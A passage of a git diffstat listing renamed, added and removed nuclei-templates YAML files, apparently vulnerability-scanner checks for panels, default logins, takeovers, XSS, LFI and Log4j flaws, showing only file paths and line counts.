=> tpshop-directory-traversal-10822.yaml} | 0 nuclei-templates/Other/traccar.yaml | 20 + ...10826.yaml => trace-axd-detect-10825.yaml} | 0 .../Other/trace-method-10829.yaml | 27 + nuclei-templates/Other/trace-method.yaml | 26 - nuclei-templates/Other/tracer-sc-login.yaml | 5 - .../Other/traefik-dashboard-10832.yaml | 15 + nuclei-templates/Other/traefik-dashboard.yaml | 17 - .../Other/translatepress-multilingual.yaml | 2 +- .../Other/transmission-dashboard.yaml | 13 +- .../Other/travis-ci-disclosure.yaml | 6 +- .../Other/trendnet-tew827dru-login.yaml | 13 +- .../Other/trilithic-viewpoint-default.yaml | 39 - .../Other/trilithic-viewpoint-login.yaml | 33 + nuclei-templates/Other/triton-lite.yaml | 59 + .../Other/truenas-scale-panel.yaml | 10 +- .../Other/tufin-securetrack-login.yaml | 13 +- .../Other/tugboat-config-exposure-10843.yaml | 33 - .../Other/tugboat-config-exposure-10844.yaml | 28 + .../Other/tumblr-takeover-10846.yaml | 24 + nuclei-templates/Other/tumblr-takeover.yaml | 27 - nuclei-templates/Other/tup-openframe.yaml | 5 +- .../Other/turbo-website-installer.yaml | 5 +- .../Other/turbocrm-xss-10848.yaml | 24 + .../Other/turbocrm-xss-10850.yaml | 31 - nuclei-templates/Other/turbomeeting.yaml | 20 + nuclei-templates/Other/turnkey-openvpn.yaml | 9 +- ...=> tuxedo-connected-controller-10852.yaml} | 0 nuclei-templates/Other/tweaker5.yaml | 59 + .../Other/twig-php-ssti-10858.yaml | 26 - .../Other/twig-php-ssti-10859.yaml | 22 + nuclei-templates/Other/twilio-api-10860.yaml | 16 - nuclei-templates/Other/twilio-api-10861.yaml | 13 + .../Other/twitter-secret-11870.yaml | 13 + nuclei-templates/Other/twitter-secret.yaml | 16 - nuclei-templates/Other/twitter.yaml | 41 +- ...rprint.yaml => txt-fingerprint-10863.yaml} | 0 nuclei-templates/Other/typo3-composer.yaml | 7 +- nuclei-templates/Other/typo3-debug-mode.yaml | 5 +- nuclei-templates/Other/typo3-installer.yaml | 5 +- .../Other/uberflip-takeover-10864.yaml | 18 - nuclei-templates/Other/uberflip-takeover.yaml | 16 + 
.../Other/ucmdb-default-login-10869.yaml | 33 - .../Other/ucmdb-default-login.yaml | 35 + nuclei-templates/Other/ulanzi-clock.yaml | 6 +- .../Other/ultimate-addons-for-gutenberg.yaml | 4 +- .../Other/ultimatemember-open-redirect.yaml | 3 - .../ultimatemember-plugin-open-redirect.yaml | 3 - ...ssrf.yaml => umbraco-base-ssrf-10882.yaml} | 0 nuclei-templates/Other/umbraco-installer.yaml | 5 +- nuclei-templates/Other/umbraco-login.yaml | 17 +- .../{signatures-10251.yaml => umbraco.yaml} | 0 .../Other/unaunthenticated-jenkin.yaml | 6 +- .../Other/unauth-axyom-network-manager.yaml | 5 +- nuclei-templates/Other/unauth-etherpad.yaml | 5 +- .../Other/unauth-fastvue-dashboard.yaml | 9 +- ...h-ftp-10942.yaml => unauth-ftp-10940.yaml} | 0 ...aml => unauth-hoteldruid-panel-10943.yaml} | 0 nuclei-templates/Other/unauth-kubecost.yaml | 66 +- .../Other/unauth-ldap-account-manager.yaml | 7 +- nuclei-templates/Other/unauth-lfd-zhttpd.yaml | 7 +- .../Other/unauth-mautic-upgrade.yaml | 7 +- nuclei-templates/Other/unauth-mercurial.yaml | 5 +- ...ad.yaml => unauth-message-read-10947.yaml} | 0 nuclei-templates/Other/unauth-psql.yaml | 5 +- nuclei-templates/Other/unauth-rlm-10960.yaml | 35 + nuclei-templates/Other/unauth-rlm.yaml | 29 - .../Other/unauth-selenium-grid-console.yaml | 8 +- .../Other/unauth-spark-api-10963.yaml | 22 + nuclei-templates/Other/unauth-spark-api.yaml | 24 - .../Other/unauth-wavink-panel.yaml | 12 +- .../Other/unauth-xproxy-dashboard-10968.yaml | 27 + .../Other/unauth-xproxy-dashboard.yaml | 26 - nuclei-templates/Other/unauth-zwave-mqtt.yaml | 7 +- ...aml => unauthenticated-airflow-10884.yaml} | 0 .../unauthenticated-alert-manager-10890.yaml | 23 - .../unauthenticated-alert-manager-10892.yaml | 20 + ...unauthenticated-duplicator-disclosure.yaml | 6 +- .../Other/unauthenticated-frp-10897.yaml | 26 - .../Other/unauthenticated-frp.yaml | 21 + .../Other/unauthenticated-glances.yaml | 4 - .../Other/unauthenticated-glowroot.yaml | 4 +- 
.../Other/unauthenticated-influxdb-10903.yaml | 27 - .../Other/unauthenticated-influxdb.yaml | 23 + .../Other/unauthenticated-jenkins.yaml | 44 +- .../unauthenticated-lansweeper-10906.yaml | 14 + .../Other/unauthenticated-lansweeper.yaml | 17 - ... unauthenticated-mongo-express-10909.yaml} | 0 ...aml => unauthenticated-netdata-10916.yaml} | 0 .../unauthenticated-nginx-dashboard.yaml | 8 +- .../unauthenticated-popup-upload-10923.yaml | 24 + .../Other/unauthenticated-popup-upload.yaml | 20 - .../Other/unauthenticated-prtg.yaml | 3 +- ...=> unauthenticated-tensorboard-10930.yaml} | 0 .../unauthenticated-varnish-cache-purge.yaml | 1 + .../Other/unauthenticated-zipkin-10935.yaml | 30 + .../Other/unauthenticated-zipkin.yaml | 31 - ...aml => unauthenticated-zippkin-10937.yaml} | 0 .../Other/unauthorized-h3csecparh-login.yaml | 4 - .../unauthorized-hp-officepro-printer.yaml | 4 +- .../Other/unauthorized-hp-printer.yaml | 48 +- .../Other/unauthorized-plastic-scm-10957.yaml | 50 + .../Other/unauthorized-plastic-scm.yaml | 42 - .../Other/unauthorized-printer-hp.yaml | 7 +- ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 20 + ...0971.yaml => unbounce-takeover-10970.yaml} | 0 .../Other/under-construction-page.yaml | 4 +- .../unencrypted-bigip-ltm-cookie-10972.yaml | 23 + nuclei-templates/Other/unibox-panel.yaml | 5 +- .../Other/unifi-network-log4j-rce-10976.yaml | 38 + .../Other/unifi-network-log4j-rce.yaml | 43 - nuclei-templates/Other/unifi-panel.yaml | 8 +- .../Other/unifi-wizard-install.yaml | 5 +- .../Other/unifi_network_application.yaml | 20 + ...unified_communications_domain_manager.yaml | 20 + .../Other/unpatched-coldfusion-10977.yaml | 33 - .../Other/unpatched-coldfusion.yaml | 30 + .../Other/untangle-admin-login.yaml | 7 +- .../Other/untrusted-root-certificate.yaml | 5 +- nuclei-templates/Other/unyson.yaml | 6 +- nuclei-templates/Other/updraftplus.yaml | 4 +- nuclei-templates/Other/upnp-device.yaml | 3 +- 
nuclei-templates/Other/ups-status-10984.yaml | 21 + nuclei-templates/Other/ups-status.yaml | 20 - nuclei-templates/Other/uptime-kuma-panel.yaml | 5 +- .../Other/uptimerobot-takeover-10987.yaml | 16 +- .../Other/url-extension-inspector.yaml | 100 +- nuclei-templates/Other/use-any-font.yaml | 2 +- nuclei-templates/Other/user-role-editor.yaml | 2 +- .../Other/uservoice-takeover.yaml | 6 +- nuclei-templates/Other/usg1000_firmware.yaml | 20 + .../Other/utility-service-detect.yaml | 7 +- nuclei-templates/Other/uvdesk-install.yaml | 5 +- nuclei-templates/Other/uwsgi-ini.yaml | 5 +- nuclei-templates/Other/v2924-admin-panel.yaml | 9 +- .../Other/vagrantfile-exposure.yaml | 5 +- nuclei-templates/Other/valid-gmail-check.yaml | 9 +- .../Other/vanguard-post-xss-10992.yaml | 34 + nuclei-templates/Other/vanguard-post-xss.yaml | 29 - nuclei-templates/Other/vault-panel.yaml | 26 +- nuclei-templates/Other/vbulletin-detect.yaml | 5 +- nuclei-templates/Other/vcenter_server.yaml | 20 + nuclei-templates/Other/vec40g.yaml | 20 + nuclei-templates/Other/veeam-backup-gcp.yaml | 9 +- nuclei-templates/Other/veeam-panel.yaml | 12 +- .../Other/velvet-blues-update-urls.yaml | 2 +- .../Other/vend-takeover-10997.yaml | 15 + nuclei-templates/Other/vend-takeover.yaml | 18 - nuclei-templates/Other/ventrilo-config.yaml | 13 +- .../Other/vercel-takeover-11001.yaml | 28 +- nuclei-templates/Other/veriz0wn-osint.yaml | 5 +- .../Other/verizon-router-panel.yaml | 9 +- .../Other/vernemq-status-page.yaml | 6 +- .../Other/versa-analytics-server.yaml | 5 +- .../Other/versa-default-login-11003.yaml | 46 + .../Other/versa-default-login.yaml | 49 - .../Other/versa-director-api.yaml | 5 +- .../Other/versa-director-login.yaml | 9 +- .../Other/versa-flexvnf-default-login.yaml | 9 +- .../Other/versa-flexvnf-panel.yaml | 9 +- .../Other/versa-flexvnf-server.yaml | 7 +- .../Other/versa-networks-detect.yaml | 7 +- nuclei-templates/Other/versa-sdwan-11005.yaml | 20 - nuclei-templates/Other/versa-sdwan.yaml | 16 + 
.../Other/versa_operating_system.yaml | 20 + nuclei-templates/Other/vertex-tax-panel.yaml | 9 +- .../Other/video-synchro-pdf-lfi.yaml | 4 - nuclei-templates/Other/videoxpert-lfi.yaml | 5 +- .../Other/vidyo-default-login-11008.yaml | 61 - .../Other/vidyo-default-login.yaml | 52 + nuclei-templates/Other/vidyo-login.yaml | 7 +- .../Other/viewlinc-crlf-injection-11014.yaml | 29 + .../Other/viewlinc-crlf-injection.yaml | 30 - .../Other/viewpoint-system-status-11018.yaml | 23 - .../Other/viewpoint-system-status-11019.yaml | 20 + nuclei-templates/Other/vigor-login-11023.yaml | 3 - nuclei-templates/Other/vinchin-panel.yaml | 5 +- nuclei-templates/Other/viper-c2.yaml | 7 +- .../Other/virtua-software-panel.yaml | 15 +- .../Other/virtual-ema-detect-11025.yaml | 21 - .../Other/virtual-ema-detect.yaml | 18 + .../Other/visionhub-default-login-11029.yaml | 34 + .../Other/visionhub-default-login.yaml | 36 - nuclei-templates/Other/vistaweb-panel.yaml | 4 +- .../Other/visual-tools-dvr-rce-11030.yaml | 28 - .../Other/visual-tools-dvr-rce-11032.yaml | 24 + .../Other/vivotex-web-console-detect.yaml | 7 +- .../vmware-authentication-daemon-detect.yaml | 66 +- .../Other/vmware-carbon-black-edr.yaml | 9 +- .../Other/vmware-cloud-availability.yaml | 9 +- .../Other/vmware-cloud-director.yaml | 12 +- nuclei-templates/Other/vmware-cloud-xss.yaml | 5 +- nuclei-templates/Other/vmware-ftp-server.yaml | 9 +- nuclei-templates/Other/vmware-hcx-log4j.yaml | 27 +- nuclei-templates/Other/vmware-hcx-login.yaml | 9 +- ...horizon.yaml => vmware-horizon-11038.yaml} | 0 .../Other/vmware-horizon-daas.yaml | 10 +- .../vmware-horizon-log4j-jndi-rce-11033.yaml | 38 + .../vmware-horizon-log4j-jndi-rce-11034.yaml | 37 - .../Other/vmware-horizon-panel-11037.yaml | 21 + .../Other/vmware-horizon-panel.yaml | 22 - .../Other/vmware-horizon-version.yaml | 5 +- nuclei-templates/Other/vmware-nsx-log4j.yaml | 36 +- nuclei-templates/Other/vmware-nsx-login.yaml | 9 +- .../Other/vmware-nsx-stream-rce.yaml | 10 +- 
.../Other/vmware-operation-manager-log4j.yaml | 34 +- .../Other/vmware-siterecovery-log4j-rce.yaml | 38 +- .../vmware-vcenter-converter-standalone.yaml | 12 +- ...lfi.yaml => vmware-vcenter-lfi-11048.yaml} | 0 .../Other/vmware-vcenter-lfi-linux-11042.yaml | 14 + .../Other/vmware-vcenter-lfi-linux-11044.yaml | 16 - .../Other/vmware-vcenter-log4j-jndi-rce.yaml | 9 +- .../Other/vmware-vcenter-ssrf.yaml | 7 +- .../Other/vmware-vcloud-director.yaml | 12 +- .../Other/vmware-version-detect-11054.yaml | 63 - .../Other/vmware-version-detect.yaml | 57 + ...yaml => vmware-vrealize-detect-11057.yaml} | 0 ...rkflow.yaml => vmware-workflow-11060.yaml} | 0 nuclei-templates/Other/vnc-detect-11062.yaml | 22 + nuclei-templates/Other/vnc-detect.yaml | 24 - .../Other/vnc-service-detect.yaml | 11 +- .../Other/vodafone-voxui-panel.yaml | 9 +- ...ect.yaml => voipmonitor-detect-11063.yaml} | 0 nuclei-templates/Other/voipmonitor-panel.yaml | 15 +- ...4.yaml => voipmonitor-workflow-11065.yaml} | 0 nuclei-templates/Other/voyager.yaml | 20 + .../Other/vpms-auth-bypass-11068.yaml | 33 - nuclei-templates/Other/vpms-auth-bypass.yaml | 32 + nuclei-templates/Other/vpn.yaml | 20 + .../Other/vrealize-loginsight-panel.yaml | 12 +- .../vrealize-operations-log4j-rce-11072.yaml | 44 + .../Other/vrealize-operations-log4j-rce.yaml | 69 - .../Other/vrealize_operations.yaml | 20 + .../Other/vrealize_operations_manager.yaml | 20 + nuclei-templates/Other/vscode-sftp.yaml | 6 +- nuclei-templates/Other/vsftpd-backdoor.yaml | 9 +- ...ction.yaml => vsftpd-detection-11073.yaml} | 0 nuclei-templates/Other/vtiger-installer.yaml | 5 +- nuclei-templates/Other/vue-pacs-panel.yaml | 10 +- nuclei-templates/Other/w3-total-cache.yaml | 2 +- .../Other/w3c-total-cache-ssrf-11080.yaml | 19 + .../Other/w3c-total-cache-ssrf.yaml | 20 - nuclei-templates/Other/wadl-api-11084.yaml | 43 + nuclei-templates/Other/wadl-api.yaml | 38 - nuclei-templates/Other/wadl-files.yaml | 4 + nuclei-templates/Other/waf-detect.yaml | 93 +- 
nuclei-templates/Other/waf-fuzz.yaml | 6 +- nuclei-templates/Other/wago-plc-panel.yaml | 5 +- .../Other/wagtail-cms-detect.yaml | 73 +- .../Other/wamp-server-configuration.yaml | 44 +- .../Other/wamp-xdebug-detect-11100.yaml | 17 + .../Other/wamp-xdebug-detect-11103.yaml | 19 - .../Other/wampserver-homepage.yaml | 9 +- ...g-ngfw-rce.yaml => wangkang-NGFW-rce.yaml} | 0 ...-rce-1.yaml => wangkang-NS-ASG-rce-1.yaml} | 0 nuclei-templates/Other/wannacry-malware.yaml | 7 +- .../Other/wapples-firewall-lfi.yaml | 8 +- nuclei-templates/Other/watcher-panel.yaml | 6 +- .../Other/watchguard-panel-11108.yaml | 25 - nuclei-templates/Other/watchguard-panel.yaml | 21 + nuclei-templates/Other/watershed-panel.yaml | 9 +- .../Other/wazuh-default-login.yaml | 36 +- ...uh-detect.yaml => wazuh-detect-11111.yaml} | 0 nuclei-templates/Other/wazuh-panel-11113.yaml | 39 - nuclei-templates/Other/wazuh-panel.yaml | 33 + nuclei-templates/Other/wazuh.yaml | 20 + nuclei-templates/Other/wd-mycloud-panel.yaml | 10 +- .../Other/weak-cipher-suites.yaml | 1081 +- nuclei-templates/Other/weatherlink-11115.yaml | 22 - nuclei-templates/Other/weatherlink-11117.yaml | 19 + ...> weave-scope-dashboard-detect-11118.yaml} | 0 .../Other/weaver-group-xml-sqli.yaml | 9 +- .../Other/weaver-jquery-file-upload.yaml | 4 +- .../weaver-lazyuploadify-file-upload.yaml | 13 +- .../Other/weaver-login-sessionkey.yaml | 4 +- .../weaver-office-server-file-upload.yaml | 8 +- .../Other/weaver-uploadify-file-upload.yaml | 16 +- nuclei-templates/Other/web-config-11125.yaml | 23 + nuclei-templates/Other/web-config.yaml | 165 - nuclei-templates/Other/web-file-manager.yaml | 9 +- .../Other/web-ftp-detect-11136.yaml | 23 + nuclei-templates/Other/web-ftp-detect.yaml | 23 - .../Other/web-local-craft-11141.yaml | 19 + nuclei-templates/Other/web-local-craft.yaml | 22 - nuclei-templates/Other/web-service-panel.yaml | 3 - .../Other/web-suite-detect-11168.yaml | 39 + nuclei-templates/Other/web-suite-detect.yaml | 36 - 
nuclei-templates/Other/web-viewer-panel.yaml | 10 +- .../Other/webalizer-statistics.yaml | 10 +- .../Other/webalizer-xtended-stats.yaml | 5 +- .../Other/webasyst-installer.yaml | 5 +- nuclei-templates/Other/webcomco-panel.yaml | 5 +- nuclei-templates/Other/webdav-enabled.yaml | 11 +- nuclei-templates/Other/webeditors-11129.yaml | 26 + .../Other/webeditors-check-detect.yaml | 50 +- nuclei-templates/Other/webeditors.yaml | 31 - .../Other/webex_meetings_online.yaml | 20 + .../Other/webflow-takeover-11133.yaml | 18 + nuclei-templates/Other/webflow-takeover.yaml | 16 - ...detect.yaml => weblogic-detect-11143.yaml} | 0 ...t.yaml => weblogic-iiop-detect-11148.yaml} | 0 nuclei-templates/Other/weblogic-login.yaml | 5 - .../Other/weblogic-t3-detect-11153.yaml | 38 + .../Other/weblogic-t3-detect.yaml | 41 - .../Other/weblogic-uddiexplorer.yaml | 11 +- ...55.yaml => weblogic-weak-login-11156.yaml} | 0 .../Other/webmin-panel-11158.yaml | 17 + nuclei-templates/Other/webmin-panel.yaml | 19 - .../Other/webmodule-ee-11162.yaml | 22 + .../Other/webmodule-ee-11164.yaml | 21 - .../Other/webmodule-ee-panel-11161.yaml | 32 + .../Other/webmodule-ee-panel.yaml | 28 - .../Other/webp-converter-for-media.yaml | 2 +- nuclei-templates/Other/webp-express.yaml | 2 +- .../Other/webp-server-go-lfi.yaml | 5 +- nuclei-templates/Other/webpack-config.yaml | 15 +- nuclei-templates/Other/webpack-mix-js.yaml | 5 +- nuclei-templates/Other/webpagetest-panel.yaml | 7 +- nuclei-templates/Other/webpagetest-ssrf.yaml | 5 +- nuclei-templates/Other/webpagetest.yaml | 20 + nuclei-templates/Other/webroot-login.yaml | 9 +- nuclei-templates/Other/websheets-config.yaml | 15 +- .../Other/webshell4-login-panel.yaml | 10 +- .../Other/websphere-portal-preauth-ssrf.yaml | 60 +- nuclei-templates/Other/websphere.yaml | 20 + ...talk-leakage.yaml => webtalk-leakage.yaml} | 0 .../Other/webtitan-cloud-panel.yaml | 12 +- nuclei-templates/Other/webtools-home.yaml | 4 - .../Other/webtransfer-client-panel.yaml | 4 +- 
nuclei-templates/Other/webui-rce-11173.yaml | 32 + nuclei-templates/Other/webui-rce.yaml | 25 - .../Other/webuzo-admin-panel.yaml | 15 +- nuclei-templates/Other/webuzo-installer.yaml | 5 +- ...ebview-addjavascript-interface-11177.yaml} | 0 .../Other/webview-javascript-11178.yaml | 16 + .../Other/webview-javascript.yaml | 13 - .../Other/webview-load-url-11181.yaml | 12 + .../Other/webview-load-url-11182.yaml | 16 - .../Other/webview-universal-access.yaml | 5 +- nuclei-templates/Other/wechat.yaml | 20 + .../weekender-newspaper-open-redirect.yaml | 3 - ...nder-newspaper-wp-theme-open-redirect.yaml | 3 - nuclei-templates/Other/weiphp-panel.yaml | 14 +- .../Other/weiphp-sql-injection-11190.yaml | 28 - .../Other/weiphp-sql-injection.yaml | 24 + .../Other/wems-manager-xss-11191.yaml | 26 + nuclei-templates/Other/wems-manager-xss.yaml | 28 - ...ml => werkzeug-debugger-detect-11196.yaml} | 0 .../Other/wget-hsts-list-exposure.yaml | 5 +- nuclei-templates/Other/wgetrc-config.yaml | 16 +- nuclei-templates/Other/whatsup_gold.yaml | 24 + nuclei-templates/Other/whm-login-detect.yaml | 3 - .../Other/widget-importer-exporter.yaml | 2 +- ....yaml => wifisky-default-login-11204.yaml} | 0 .../Other/wifisky-default-password.yaml | 8 +- .../Other/wildcard-postmessage.yaml | 3 - nuclei-templates/Other/wildcard-tls.yaml | 18 +- .../Other/wildfly-default-login.yaml | 8 +- ...ly-panel.yaml => wildfly-panel-11211.yaml} | 0 .../Other/window-name-domxss-11213.yaml | 81 + .../Other/window-name-domxss.yaml | 81 - nuclei-templates/Other/windows-lfi-fuzz.yaml | 71 - .../Other/wing-ftp-service-detect.yaml | 2 +- .../Other/wireless-leakage(1).yaml | 6 +- nuclei-templates/Other/wiren-board-webui.yaml | 8 +- ...over.yaml => wishpond-takeover-11217.yaml} | 0 ...-takeover.yaml => wix-takeover-11220.yaml} | 0 nuclei-templates/Other/wms-server-detect.yaml | 5 +- .../Other/wmw-enterprise-panel.yaml | 6 +- nuclei-templates/Other/wn604.yaml | 20 + ...etect.yaml => wondercms-detect-11222.yaml} | 0 
.../Other/woo-cart-abandonment-recovery.yaml | 2 +- .../Other/woo-checkout-field-editor-pro.yaml | 2 +- .../Other/woo-variation-swatches.yaml | 2 +- ...merce-gateway-paypal-express-checkout.yaml | 6 +- .../Other/woocommerce-gateway-stripe.yaml | 2 +- .../Other/woocommerce-payments.yaml | 6 +- .../Other/woocommerce-paypal-payments.yaml | 2 +- ...oocommerce-pdf-invoices-packing-slips.yaml | 2 +- .../Other/woocommerce-pdf-invoices-xss.yaml | 15 +- .../Other/woocommerce-services.yaml | 2 +- nuclei-templates/Other/woocommerce.yaml | 2 +- nuclei-templates/Other/woodwing-panel.yaml | 14 +- ...227.yaml => wooyun-2015-148227-11227.yaml} | 0 .../Other/wooyun-2015-148227-11228.yaml | 2 +- .../Other/wooyun-path-traversal-11229.yaml | 31 + .../Other/wooyun-path-traversal.yaml | 29 - nuclei-templates/Other/wordfence.yaml | 2 +- nuclei-templates/Other/wordpress-LFI.yaml | 21 - .../wordpress-accessible-wpconfig-11236.yaml | 42 + .../Other/wordpress-accessible-wpconfig.yaml | 38 - ...l => wordpress-affiliatewp-log-11243.yaml} | 0 .../wordpress-auth-bypass-wptimecapsule.yaml | 10 +- ...=> wordpress-db-backup-listing-11248.yaml} | 0 .../Other/wordpress-db-repair-11254.yaml | 13 +- ...59.yaml => wordpress-debug-log-11258.yaml} | 0 nuclei-templates/Other/wordpress-detect.yaml | 8 +- .../wordpress-directory-listing-11262.yaml | 21 + .../wordpress-directory-listing-11263.yaml | 25 - .../wordpress-duplicator-path-traversal.yaml | 4 +- .../wordpress-elementor-plugin-listing.yaml | 4 - ...emails-verification-for-woocommerce-1.yaml | 29 + ... 
=> wordpress-emergency-script-11272.yaml} | 0 ...8.yaml => wordpress-git-config-11279.yaml} | 0 .../Other/wordpress-gotmls-detect-11280.yaml | 30 - .../Other/wordpress-gotmls-detect.yaml | 25 + .../Other/wordpress-importer.yaml | 2 +- ...ordpress-infinitewp-auth-bypass-11285.yaml | 60 + .../wordpress-infinitewp-auth-bypass.yaml | 58 - .../Other/wordpress-installer-log-11290.yaml | 21 - .../Other/wordpress-installer-log.yaml | 19 + nuclei-templates/Other/wordpress-lfi(1).yaml | 25 + ...-login.yaml => wordpress-login-11295.yaml} | 0 .../Other/wordpress-plugins-detect-11298.yaml | 27 + .../Other/wordpress-plugins-detect.yaml | 22 - .../Other/wordpress-readme-file.yaml | 6 +- .../wordpress-redirection-plugin-listing.yaml | 7 +- .../Other/wordpress-registration-enabled.yaml | 24 + ...hing.yaml => wordpress-rest-dosviacp.yaml} | 0 nuclei-templates/Other/wordpress-seo.yaml | 2 +- ...yaml => wordpress-simplefilelist-rce.yaml} | 0 .../Other/wordpress-takeover-11313.yaml | 26 - .../Other/wordpress-takeover.yaml | 22 + .../Other/wordpress-themes-detect.yaml | 16 +- .../Other/wordpress-tmm-db-migrate-11317.yaml | 23 + .../Other/wordpress-tmm-db-migrate-11320.yaml | 33 - .../wordpress-updraftplus-pem-key-11328.yaml | 27 - .../Other/wordpress-updraftplus-pem-key.yaml | 23 + .../Other/wordpress-user-enumeration.yaml | 6 +- ... => wordpress-weak-credentials-11334.yaml} | 0 ... 
wordpress-woocommerce-listing-11341.yaml} | 0 .../wordpress-woocommerce-sqli-11343.yaml | 39 + .../Other/wordpress-woocommerce-sqli.yaml | 38 - ...debars.yaml => wordpress-woosidebars.yaml} | 0 .../Other/wordpress-wordfence-lfi-11349.yaml | 25 - .../Other/wordpress-wordfence-lfi-11351.yaml | 21 + ...dpress-wordfence-waf-bypass-xss-11354.yaml | 25 + .../wordpress-wordfence-waf-bypass-xss.yaml | 29 - .../Other/wordpress-wordfence-xss-11359.yaml | 23 + .../Other/wordpress-wordfence-xss.yaml | 27 - ...low.yaml => wordpress-workflow-11366.yaml} | 0 nuclei-templates/Other/wordpress-wp-cron.yaml | 6 +- ...ress-wpcourses-info-disclosure-11367.yaml} | 0 .../Other/wordpress-xmlrpc-brute-force.yaml | 50 + .../Other/wordpress-xmlrpc-listmethods.yaml | 1 + .../Other/wordpress-zebra-form-xss-11378.yaml | 34 + .../Other/wordpress-zebra-form-xss.yaml | 38 - .../Other/wordpress_SSRF_Qards (1).yaml | 64 +- nuclei-templates/Other/worker.yaml | 2 +- .../Other/workerman-websocket-detect.yaml | 5 +- nuclei-templates/Other/workflow.yaml | 11 +- nuclei-templates/Other/workresources-rdp.yaml | 4 - .../Other/worksites-detection-11385.yaml | 17 + .../Other/worksites-detection.yaml | 17 - ...ver.yaml => worksites-takeover-11388.yaml} | 0 ...paceone-uem-airwatch-dashboard-detect.yaml | 1 - .../Other/wowza-streaming-engine-11399.yaml | 22 + .../Other/wowza-streaming-engine.yaml | 23 - ...p-123contactform-plugin-listing-11400.yaml | 28 - .../wp-123contactform-plugin-listing.yaml | 24 + nuclei-templates/Other/wp-adaptive-xss.yaml | 5 - nuclei-templates/Other/wp-all-export-xss.yaml | 18 +- .../Other/wp-altair-listing-11405.yaml | 27 - nuclei-templates/Other/wp-altair-listing.yaml | 24 + .../Other/wp-ambience-xss-11407.yaml | 29 - .../Other/wp-ambience-xss-11410.yaml | 24 + ...{wp-app-log.yaml => wp-app-log-11411.yaml} | 0 .../Other/wp-arforms-listing-11415.yaml | 23 + .../Other/wp-arforms-listing.yaml | 28 - ...pose-cloud-ebook-plugin-file-download.yaml | 2 +- .../Other/wp-blogroll-fun-xss.yaml | 
9 +- .../Other/wp-brandfolder-plugin-lfi.yaml | 2 +- .../wp-brandfolder-plugin-open-redirect.yaml | 3 - .../Other/wp-cherry-plugin-file-download.yaml | 2 +- .../Other/wp-church-admin-lfi.yaml | 2 +- ...20.yaml => wp-church-admin-xss-11422.yaml} | 0 nuclei-templates/Other/wp-cli-exposure.yaml | 5 +- .../Other/wp-config.php-disclosure.yaml | 35 +- ...s.yaml => wp-custom-tables-xss-11435.yaml} | 0 nuclei-templates/Other/wp-fastest-cache.yaml | 2 +- nuclei-templates/Other/wp-file-manager.yaml | 2 +- ...nder-xss.yaml => wp-finder-xss-11448.yaml} | 0 .../Other/wp-flagem-xss-11451.yaml | 29 + nuclei-templates/Other/wp-flagem-xss.yaml | 24 - .../Other/wp-full-path-disclosure-11455.yaml | 9 +- nuclei-templates/Other/wp-google-maps.yaml | 2 +- .../Other/wp-grimag-open-redirect-11460.yaml | 17 + .../Other/wp-grimag-open-redirect.yaml | 20 - .../wp-gtranslate-open-redirect-11466.yaml | 22 - .../Other/wp-gtranslate-open-redirect.yaml | 22 + .../Other/wp-haberadam-idor-11468.yaml | 5 - ...wp-idx-broker-platinum-listing-11471.yaml} | 0 nuclei-templates/Other/wp-insert-php-xss.yaml | 8 +- nuclei-templates/Other/wp-install-11473.yaml | 22 + nuclei-templates/Other/wp-install.yaml | 25 - .../Other/wp-iwp-client-listing-11476.yaml | 23 + .../Other/wp-iwp-client-listing.yaml | 25 - nuclei-templates/Other/wp-javospot-lfi.yaml | 4 - .../Other/wp-javospot-premium-theme-lfi.yaml | 2 +- .../Other/wp-kadence-blocks-rce.yaml | 9 +- .../Other/wp-knews-xss-11488.yaml | 24 + nuclei-templates/Other/wp-knews-xss.yaml | 29 - .../Other/wp-license-file-11489.yaml | 18 + nuclei-templates/Other/wp-license-file.yaml | 22 - nuclei-templates/Other/wp-mail-smtp.yaml | 2 +- .../wp-mailchimp-log-exposure-11494.yaml | 28 + .../Other/wp-mailchimp-log-exposure.yaml | 23 - .../Other/wp-maintenance-mode.yaml | 2 +- ...p-memphis-documents-library-lfi-11497.yaml | 30 + .../wp-memphis-documents-library-lfi.yaml | 36 - nuclei-templates/Other/wp-migrate-db.yaml | 2 +- nuclei-templates/Other/wp-misconfig.yaml | 36 + 
...ml => wp-mstore-plugin-listing-11501.yaml} | 0 .../Other/wp-multibyte-patch.yaml | 2 +- .../Other/wp-multiple-theme-ssrf-11511.yaml | 28 + .../Other/wp-multiple-theme-ssrf.yaml | 31 - .../Other/wp-nextgen-xss-11517.yaml | 29 + nuclei-templates/Other/wp-nextgen-xss.yaml | 25 - nuclei-templates/Other/wp-optimize.yaml | 4 +- .../Other/wp-oxygen-theme-lfi-11521.yaml | 30 + .../Other/wp-oxygen-theme-lfi-11523.yaml | 27 - nuclei-templates/Other/wp-pagenavi.yaml | 4 +- .../Other/wp-phpfreechat-xss-11524.yaml | 25 + .../Other/wp-phpfreechat-xss-11527.yaml | 29 - ...-plugin-1-flashgallery-listing-11530.yaml} | 0 .../Other/wp-plugin-ad-widget-lfi.yaml | 2 +- ...ms.yaml => wp-plugin-lifterlms-11535.yaml} | 0 .../wp-plugin-marmoset-viewer-xss-11538.yaml | 6 +- .../Other/wp-plugin-statistics-sqli.yaml | 5 - .../Other/wp-plugin-utlimate-member.yaml | 7 +- .../Other/wp-plugin-wp-with-spritz-lfi.yaml | 2 +- .../wp-prostore-open-redirect-11550.yaml | 17 + .../Other/wp-prostore-open-redirect.yaml | 20 - nuclei-templates/Other/wp-qards-listing.yaml | 45 +- .../Other/wp-qwiz-online-xss.yaml | 7 +- .../Other/wp-registration-enabled.yaml | 8 +- .../Other/wp-related-post-xss.yaml | 6 +- nuclei-templates/Other/wp-reset.yaml | 2 +- .../wp-revslider-file-download-11553.yaml | 62 +- .../Other/wp-securimage-xss-11557.yaml | 29 + nuclei-templates/Other/wp-securimage-xss.yaml | 24 - .../Other/wp-security-open-redirect.yaml | 23 +- nuclei-templates/Other/wp-setup-config.yaml | 4 - .../Other/wp-sfwd-lms-listing-11562.yaml | 26 - .../Other/wp-sfwd-lms-listing-11565.yaml | 23 + .../Other/wp-simple-fields-lfi-11568.yaml | 19 - .../Other/wp-simple-fields-lfi-11571.yaml | 16 + .../Other/wp-site-editor-lfi.yaml | 5 +- nuclei-templates/Other/wp-sitemap-page.yaml | 2 +- ...11576.yaml => wp-slideshow-xss-11574.yaml} | 0 nuclei-templates/Other/wp-smushit.yaml | 4 +- ...11582.yaml => wp-socialfit-xss-11581.yaml} | 0 nuclei-templates/Other/wp-statistics.yaml | 4 +- 
